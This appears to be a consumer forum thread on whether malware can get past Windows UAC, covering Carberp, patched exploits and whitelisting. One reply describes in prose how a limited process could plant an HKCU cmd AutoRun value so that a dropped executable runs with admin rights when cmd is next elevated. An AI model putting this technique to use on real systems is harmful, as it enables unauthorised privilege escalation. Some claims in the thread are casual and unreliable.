Is it possible for malware to bypass UAC?

I've heard of this happening only once.

 

It's possible. I haven't got any example sorry, but when uac is bypass generaly microsoft try to update uac quickly.

 

I guess that depends on what you term as bypass

If you mean, can you get a malware when you are using UAC/LUA, then yes, most certainly.

If you mean, can malware get by UAC without the user "allowing" it, then I don't know of specific examples, but have seen a few reports of such things. I think it is pretty limited though, as the weak spot of UAC isn't how secure it is, but how secure the user is.

Sul.

 

I don't mean getting malware. I know that malware can run with UAC, it just can't do as much.

What I'm looking for are specific reports of UAC being bypassed via bug/glitch/whatever but NOT by tricking the user.

Follow up question: Do you think that putting a password in UAC would make it any bit more secure?

 

If there was known way to do it, it would be immediately fixed by security update. And if you mean the theoretical possibility, theoretically everything is possible because there is nothing perfect.

 

I realize it's "possible" but I'm looking to see how viable it is. I'm looking for actual legit exploits that have bypasses UAC and managed to elevate.

 

If running as an Admin user, I would say yes providing that you have set Prompt for Credentials in Group Policy.

 

I dunno but i have not been infected by malware ever since ive use windows 7 and i'll guarantee you that

 

i once found a malware that bypass it
basicly most new malware bypass it

 

I don't know if that's the case... from what I understand if you have it at default/max it is nearly impossible to get around barring some 0-day exploit.

 

I don't know about bypassing UAC, but there's certainly no need for malware to require a UAC elevation in order to do its evil, i.e. malware can avoid UAC rather than having to find a way through UAC.

 

Yes, most malware can simply avoid UAC but any malware that isn't able to run as admin is going to be incredibly easy to remove/ won't do much damage to the computer.

 

I have also thought about this. Is it same thing from the executables perspective, if it's run in Standard User -account, or in the Protected Admin account with UAC enabled?

 

You're not acquainted with the Carberp trojan then? Carberp is as dangerous as Zeus but doesn't require admin privileges and hence avoids UAC.

 

I'm not familiar. I mean, I can imagine they can mess things up but it won't be able to touch your OS/Registry.

 

Carberp steals your banking login information and passwords in a similar way to Zeus. It's about as bad as it gets.

 

Yeah... but that's not what I'm talking about =p it won't ruin the computer itself.

 

Carberp also installs a plug-in that removes other malware from the infected machine. That's brilliant.

 

maybe it could be used as a cleaning tool?

 

the old and already patched "LNK Exploit"... I think it was able to bypass UAC but is already patched by microsoft.
(bypass = UAC is ON but did prompt for consent on elevation.)

 

Brings to mind all the smug individuals (uh oh, could I be one?) who wish to assure everyone that their systems are clean, and Carberp is like, oh yeah, it's real clean.

 

hahaha!

 

I don't know if this is what you are looking for, but I remember reading here, if I'm not wrong a post by the user "moonblood" that at a default admin account protected by UAC there is some ways. One example mentioned is create a autorun value in the shell of cmd at the registry (under HKCU so no problems being with the limited token) and after, when the cmd was elevated, generating the UAC prompt when changing the limited to the administrator token, it will load the value you created as limited as admin, bypassing UAC. Looks like this: you are browsing and get hit by a malware driveby. It not generate the UAC prompt and run as limited. It create the autorun registry key at HKCU pointing to a executable dropped by the driveby. Next time cmd.exe run elevated, it will load the value, starting the value at autorun as admin too.

Sorry for the bad english and please if I misunderstood something, correct me.

 

I can understand fine, good explanation. That's an interesting work around, thanks.

 

Yes it can. its called by a couple name
"Rights Escilation"
"Privilege Escalation"


Some examples:
http://greyhat-security.com/windows-7-uac-buffer-overflow-privilege-escalation-0-day
http://eromang.zataz.com/2011/02/06/ms10-073-microsoft-windows-keyboard-layout-privilege-escalation/


Wiki definition:
"Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application with more privileges than intended by the application developer or system administrator can perform unauthorized actions."

This is not by design of course. It comes from bugs in the OS or other software but it has happened multiple times in windows 7.

Do remember though that malware can do things even in user space. It might not be as severe as if they had entire control of your system but they can steal data (email addresses for example) or anything you have sitting around in your profile.

This is why application whitelisting in SRP & applocker is such a good thing